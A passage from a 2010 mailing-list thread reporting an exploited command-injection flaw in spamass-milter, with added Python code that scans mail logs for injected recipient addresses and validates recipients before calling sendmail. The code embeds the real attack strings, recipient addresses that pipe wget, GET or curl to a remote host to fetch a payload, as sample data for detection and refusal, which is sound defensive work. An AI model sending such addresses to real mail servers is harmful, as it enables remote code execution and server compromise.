removed the /xS directory.

6. It created an empty file name /dev/devno

7. It restarted sshd using /sbin/service

Again, this was all done under the spamass_milter_t security context.

I don't know enough about the sendmail <-> spamass-milter <-> spamd
pipeline to have a definitive idea about what application misparsed
the piped e-mail addresses and executed them.

I saw the attack again this morning, but by then I'd cleaned things up
and gotten SELinux back into Enforcing mode, which prevented the
exploit from working again.
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
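The recipient addresses quoted above are the thing a mail administrator can hunt for in logs already on disk. The following is an added example, not code from the thread: it pulls angle-bracketed addresses out of constructed maillog lines (the field layout is invented; only the four addresses are the reported ones), flags any address that contains shell syntax, and collects the hosts the injected commands would fetch from, for a block list and for a search of outbound proxy or flow logs.

```python
"""Flag recipient addresses that carry shell commands, as seen in the report.

Added example, not part of the original thread. The log lines below are
constructed: their layout only approximates a sendmail maillog, and the
scanner relies solely on the angle-bracketed address, so it also works on
a plain list of RCPT TO values.
"""
import re
from typing import Dict, List

# An address in angle brackets; a quoted local part may contain anything
# but a double quote, so consume quoted runs as a unit.
ADDR_RE = re.compile(r'<((?:"[^"]*"|[^>"])*)>')
# Shell syntax that has no business in a mailbox name.
SHELL_META_RE = re.compile(r'[|;&`]|\$\(|\n')
# Downloaders named in the report; used only to label a finding.
FETCH_CMD_RE = re.compile(r'\b(wget|curl|GET)\b')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')

# Constructed sample; the four addresses are the ones from the report,
# the surrounding fields are invented.
SAMPLE_LOG = [
    'Mar 15 05:46:58 mx sendmail[4242]: to=<alice@example.com>, stat=Sent',
    'Mar 15 05:47:01 mx sendmail[4243]: rejected recipient <root+:> from [192.0.2.10]',
    'Mar 15 05:47:02 mx sendmail[4244]: rejected recipient <root+:"|wget http://61.100.185.177/busy-1.php"> from [192.0.2.10]',
    'Mar 15 05:47:03 mx sendmail[4245]: rejected recipient <root+:"|GET http://61.100.185.177/busy-2.php"> from [192.0.2.10]',
    'Mar 15 05:47:04 mx sendmail[4246]: rejected recipient <root+:"|curl http://61.100.185.177/busy-3.php"> from [192.0.2.10]',
]


def scan_line(line: str) -> List[Dict[str, object]]:
    """One finding per bracketed address in `line` that contains shell syntax."""
    findings = []
    for addr in ADDR_RE.findall(line):
        if not SHELL_META_RE.search(addr):
            continue
        findings.append({
            "address": addr,
            "commands": FETCH_CMD_RE.findall(addr),  # e.g. ['wget']
            "urls": URL_RE.findall(addr),            # where the payload was fetched from
        })
    return findings


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run scan_line over a whole log, tagging each finding with its line number."""
    out = []
    for lineno, line in enumerate(lines, 1):
        for finding in scan_line(line):
            finding["lineno"] = lineno
            out.append(finding)
    return out


def indicators(findings: List[Dict[str, object]]) -> List[str]:
    """Distinct hosts the injected commands would contact; feed these to a
    block list and to a search of proxy or flow logs for outbound hits."""
    hosts = set()
    for finding in findings:
        for url in finding["urls"]:
            hosts.add(url.split("://", 1)[1].split("/", 1)[0])
    return sorted(hosts)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(f"line {hit['lineno']}: {hit['commands']} -> {hit['urls']}")
    print("hosts to hunt for:", indicators(hits))
```

Note that the bare `<root+:>` form is not flagged: it contains no shell syntax, and the scanner deliberately keys on command injection rather than on every address sendmail rejects, so it stays quiet on ordinary typos.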
Paul Heinlein
2010-03-16 21:19:25 UTC
Permalink
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
Belatedly, I found a notice:

http://seclists.org/fulldisclosure/2010/Mar/267

And some exploit code:

http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
Yury V. Zaytsev
2010-03-17 08:42:03 UTC
Permalink
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!

spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what's the practical use of it), so it's not
vulnerable.

However, I will be happy to include the patch that upstream is cooking
when it's ready:

http://savannah.nongnu.org/bugs/index.php?29136

I don't have time to track this page and also do not have a Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.

Thanks!
--
Sincerely yours,
Yury V. Zaytsev
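Yury's point that the default configuration omits -x narrows the exposure to the alias-expansion helper, which hands a recipient to sendmail -bv. As an added illustration (not spamass-milter's code; the thread does not say how 0.3.1 invoked sendmail, and nothing about that is assumed here), this is how such a helper is written defensively: the RCPT TO value is checked against a conservative allowlist and then passed to sendmail -bv as a single argv element with no shell in between, so the reported addresses are refused before any process starts. The sendmail path and the benign addresses are assumptions.

```python
"""Validate a RCPT TO value and hand it to `sendmail -bv` as an argv element.

Added illustration of the hardening for an alias-expansion helper like the
milter's -x path, not spamass-milter's own code. The sendmail path is an
assumption; the recipient strings are the reported ones plus constructed
benign ones.
"""
import re
import subprocess
from typing import Callable, List

SENDMAIL = "/usr/sbin/sendmail"  # assumed location

# Allowlist: dot-atom local part with optional +detail, optional domain.
# Quoted local parts are legal in SMTP but are refused here on purpose: a
# helper that spawns processes should only see names it fully understands.
SAFE_RCPT_RE = re.compile(r"^[A-Za-z0-9._+-]+(@[A-Za-z0-9.-]+)?$")

Runner = Callable[..., "subprocess.CompletedProcess[str]"]


def strip_brackets(rcpt: str) -> str:
    """libmilter passes RCPT TO as written, usually `<user@host>`; drop one pair."""
    rcpt = rcpt.strip()
    if rcpt.startswith("<") and rcpt.endswith(">"):
        rcpt = rcpt[1:-1]
    return rcpt


def is_safe_recipient(rcpt: str) -> bool:
    """True only for addresses the allowlist fully describes."""
    return SAFE_RCPT_RE.fullmatch(strip_brackets(rcpt)) is not None


def expand_recipient(rcpt: str, run: Runner = subprocess.run) -> str:
    """Return sendmail's -bv output for `rcpt`.

    The address reaches execve() as one argv element (shell=False), so a
    pipe or quote inside it is data, not syntax. It is still validated
    first: sendmail should never be asked about a string that is not a
    mailbox name, and the refusal gives a clean log line to alert on.
    `run` is injectable so the call can be exercised without a real sendmail.
    """
    addr = strip_brackets(rcpt)
    if not is_safe_recipient(addr):
        raise ValueError(f"refusing to expand suspicious recipient {rcpt!r}")
    proc = run([SENDMAIL, "-bv", addr], shell=False,
               capture_output=True, text=True, timeout=10, check=False)
    return proc.stdout


# The four recipients from the report plus two constructed benign ones.
REPORTED = ['<root+:>',
            '<root+:"|wget http://61.100.185.177/busy-1.php">',
            '<root+:"|GET http://61.100.185.177/busy-2.php">',
            '<root+:"|curl http://61.100.185.177/busy-3.php">']
BENIGN = ["<alice@example.com>", "<bob+lists@example.com>"]


def triage(rcpts: List[str]) -> List[str]:
    """Label each address 'ok' or 'refused' without spawning anything."""
    return ["ok" if is_safe_recipient(r) else "refused" for r in rcpts]


if __name__ == "__main__":
    for r, verdict in zip(REPORTED + BENIGN, triage(REPORTED + BENIGN)):
        print(f"{verdict:8} {r}")
```

The allowlist is stricter than RFC 5321 permits; that is the trade-off for a helper whose only job is to ask sendmail about ordinary mailboxes, and rejected addresses can be logged and counted rather than silently dropped.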